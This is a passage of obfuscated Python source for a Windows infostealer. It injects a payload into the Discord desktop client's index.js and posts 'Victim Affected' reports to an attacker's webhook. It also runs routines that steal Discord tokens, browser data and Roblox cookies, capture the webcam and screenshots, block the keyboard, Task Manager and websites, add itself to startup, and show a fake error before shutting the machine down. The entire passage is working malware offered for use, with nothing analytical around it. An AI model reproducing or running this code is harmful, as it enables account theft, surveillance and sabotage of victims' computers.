            NEDOXDTOICDFQITKIRHQFNVMEPONTHRFZLTQZHGWRKAAZVGLPMZMFSWGNCGMPNPHRIGGGUWNFEWLAGTKWGDLYYFUJP = g3t_c0r3(WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI)
            if NEDOXDTOICDFQITKIRHQFNVMEPONTHRFZLTQZHGWRKAAZVGLPMZMFSWGNCGMPNPHRIGGGUWNFEWLAGTKWGDLYYFUJP is not None:
                v4r_core, v4r_core_file = NEDOXDTOICDFQITKIRHQFNVMEPONTHRFZLTQZHGWRKAAZVGLPMZMFSWGNCGMPNPHRIGGGUWNFEWLAGTKWGDLYYFUJP
                
                GJWHXANLQOBZDHHLKTJHQCOFKCDOQZYEMVADIVRNHHTXLPVURKNNJVARPZNIQBPVDOKNPTLVNQBHBKBMKVOKBXKPCDCHKPME = v4r_core + '\\index.js'
                
                if not os.path.exists(GJWHXANLQOBZDHHLKTJHQCOFKCDOQZYEMVADIVRNHHTXLPVURKNNJVARPZNIQBPVDOKNPTLVNQBHBKBMKVOKBXKPCDCHKPME):
                    open(GJWHXANLQOBZDHHLKTJHQCOFKCDOQZYEMVADIVRNHHTXLPVURKNNJVARPZNIQBPVDOKNPTLVNQBHBKBMKVOKBXKPCDCHKPME, 'w').close()

                with open(GJWHXANLQOBZDHHLKTJHQCOFKCDOQZYEMVADIVRNHHTXLPVURKNNJVARPZNIQBPVDOKNPTLVNQBHBKBMKVOKBXKPCDCHKPME, 'w', encoding='utf-8') as f:
                    f.write((KTRTPIFRWGLYOMKIOCZZXQMAUOTKUBQSCDGNLWTKMHWALZRFLBLPHNFTZJ).replace('discord_desktop_core-1', v4r_core_file)
                            .replace(r"%WEBHOOK_HERE%", IRVSXQEWORQNCPNYJWXUARMTWBVSIBTHPIGCGNNIBMVPQILTZJDKCJNRFCOVXTMKVRAONNJTXPVPOQX)
                            .replace(r"%EMBED_COLOR%", str(DYYJNOODIRRNJIMFFKAPWJVJOLGUDXYLUWVVJKPFNJPBAQKZXPJFRJWIYEGPYWXSBEX))
                            .replace(r"%USERNAME%", XJSLVQNQTGIKEGBIFMHZXVESMILUPDZMVSBRUTTUSDVISDAJLHRAQYGRELMJDVSLHUIYGTVGYSEWELPRQRZLUWFW)
                            .replace(r"%IP_PUBLIC%", NZPBHKLPXUONPGQBWBHDLQWGJJVHWAVGGTHPMXHMBYRJNJDXUMCZUBSDICQEIDNDWVEIYUMUACVSTEAPQT)
                            .replace(r"%EMBED_NAME%", CGTTQKDOHQKBVQZQKOHAIUNJLGNWOPIHTPLVNQNSZMKGFGHUZQXNKTMGFOHABAHYGOICUTWLJEOOADFERLEFOEIELYRJWDYF)
                            .replace(r"%EMBED_ICON%", QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ)
                            .replace(r"%FOOTER_TEXT%", UQNIKGREAMWSDRRWEOGXJXLXTQRFXWFUSZENMCFQJGITHRENYRQBMPZQLHRU)
                            .replace(r"%WEBSITE%", PSGKJIZXUYBZOTQIPRPOTJGGOBNMIHYXZTHMAMSVCQLODWGRHHEXDNZARWFZRBTMWVANHCKLBOPTWWDPREMS))
                st4rt_d15c0rd(WLSIPMTEXVOZYIAKJOXKXHQAAMQLGSZWEQIQMJJVIQKUMKRECHLOWQPPNNMSOJRBXRI)
    inj3ct_c0d3()

try: requests.post(IRVSXQEWORQNCPNYJWXUARMTWBVSIBTHPIGCGNNIBMVPQILTZJDKCJNRFCOVXTMKVRAONNJTXPVPOQX, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': CGTTQKDOHQKBVQZQKOHAIUNJLGNWOPIHTPLVNQNSZMKGFGHUZQXNKTMGFOHABAHYGOICUTWLJEOOADFERLEFOEIELYRJWDYF, 'avatar_url': QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ,})
except: pass
try: threading.Thread(target=B10ck_K3y).start()
except: pass
try: threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except: pass
try: threading.Thread(target=B10ck_W3b5it3).start()
except: pass
try: threading.Thread(target=St4rtup).start()
except: pass
try: Sy5t3m_Inf0()
except: pass
try: Di5c0rd_T0k3n()
except: pass
try: Di5c0rd_inj3c710n()
except: pass
try: Br0w53r_5t341()
except: pass
try: R0b10x_C00ki3()
except: pass
try: C4m3r4_C4ptur3()
except: pass
try: Op3n_U53r_Pr0fi13_53tting5()
except: pass
try: Scr33n5h0t()
except: pass
try: requests.post(IRVSXQEWORQNCPNYJWXUARMTWBVSIBTHPIGCGNNIBMVPQILTZJDKCJNRFCOVXTMKVRAONNJTXPVPOQX, json={'content': f'****╚══════════════════{NZPBHKLPXUONPGQBWBHDLQWGJJVHWAVGGTHPMXHMBYRJNJDXUMCZUBSDICQEIDNDWVEIYUMUACVSTEAPQT}══════════════════╝****', 'username': CGTTQKDOHQKBVQZQKOHAIUNJLGNWOPIHTPLVNQNSZMKGFGHUZQXNKTMGFOHABAHYGOICUTWLJEOOADFERLEFOEIELYRJWDYF, 'avatar_url': QOLVKKQIAJDOYVDRESETHAUKQYKLEXNVJMBKTNHTNVNIHEYCCBQ})
except: pass
try: threading.Thread(target=Sp4m_Opti0ns).start()
except: pass
try: threading.Thread(target=R3st4rt).start()
except: pass
try: threading.Thread(target=F4k3_3rr0r).start()
except: pass
try: threading.Thread(target=Shutd0wn).start()
except: pass
Clear()
